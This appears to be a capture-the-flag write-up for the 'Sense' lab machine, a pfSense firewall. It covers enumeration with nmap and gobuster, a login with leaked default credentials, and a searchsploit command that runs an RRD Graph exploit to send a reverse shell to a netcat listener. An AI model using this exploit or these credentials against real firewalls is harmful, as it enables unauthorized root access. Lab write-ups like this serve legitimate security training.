Summary
Sense, an easy Linux machine, makes use of a vulnerable firewall called PFSense to block attempted brute forcing attacks. However, enumeration of the machine reveals the credentials we need to gain access and exploit a vulnerable portion of the firewall's interface, dropping us directly into a root shell.
Enumeration
Initial review of nmap shows the only ports open are over HTTP and HTTPS:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 20:10 EDT
Nmap scan report for 10.10.10.60
Host is up (0.042s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.67 secondsTaking this into consideration, we can run the following gobuster scan in the background while manually interacting and enumerating the web server:
===============================================================
Gobuster v3.0.1
===============================================================
[+] Url: https://10.10.10.60
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Expanded: true
===============================================================
2019/07/06 21:47:09 Starting gobuster
===============================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/help.php (Status: 200)
https://10.10.10.60/index.php (Status: 200)
https://10.10.10.60/stats.php (Status: 200)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/edit.php (Status: 200)
https://10.10.10.60/system.php (Status: 200)
https://10.10.10.60/status.php (Status: 200)
https://10.10.10.60/license.php (Status: 200)
https://10.10.10.60/changelog.txt (Status: 200)
https://10.10.10.60/classes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/widgets (Status: 301)
https://10.10.10.60/exec.php (Status: 200)
https://10.10.10.60/graph.php (Status: 200)
https://10.10.10.60/tree (Status: 301)
https://10.10.10.60/wizard.php (Status: 200)
https://10.10.10.60/shortcuts (Status: 301)
https://10.10.10.60/pkg.php (Status: 200)
https://10.10.10.60/installer (Status: 301)
https://10.10.10.60/wizards (Status: 301)
https://10.10.10.60/xmlrpc.php (Status: 200)
https://10.10.10.60/reboot.php (Status: 200)
https://10.10.10.60/interfaces.php (Status: 200)
https://10.10.10.60/csrf (Status: 301)
https://10.10.10.60/system-users.txt (Status: 200)
https://10.10.10.60/filebrowser (Status: 301)
https://10.10.10.60/%7Echeckout%7E (Status: 403)
===============================================================
2019/07/06 21:55:51 Finished
===============================================================While there's almost an overload of directories discovered, two items stick out the most: /changelog.txt and /system-users.txt. Accessing /system-users.txt shows the following support ticket detailing the need for a user to be created with a credential set of "rohit" and company defaults:
Foothold
Although this doesn't give us full access immediately, it does point is in the right direction. Going back to the landing page and attempting to login with a username of "rohit" and default password of the PFSense device, "pfsense", grants us access:
Privilege Escalation
Now that we have access to the web interface, we notice the version displayed proudly for us to use when searching for potential exploits. While there's plenty that appear to work for this version number, remembering the /changelog.txt file from earlier could assist in whittling this list down:
Armed with this knowledge, we can go do some good, old fashioned Googling to find a blog post detailing 3 exploits affecting this version of PFSense. Reading this, there is only one location of the web server we can manipulate: an exploit that will give access via the RRD Graph. We can use the an exploit from searchsploit to hopefully give us a shell.
Having to make some simple changes to exploits is part is no stranger to the OSCP and this python script is some nice practice. Noticing errors with a URL not parsing as a string, hardcoding the exploit with Sense's IP Address will do the trick. Running the following command after making the changes will give us a reverse shell:
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.14 --lport 1234 --username rohit --password pfsenseSetting up a netcat listener will give us an easy root and access to that flag:
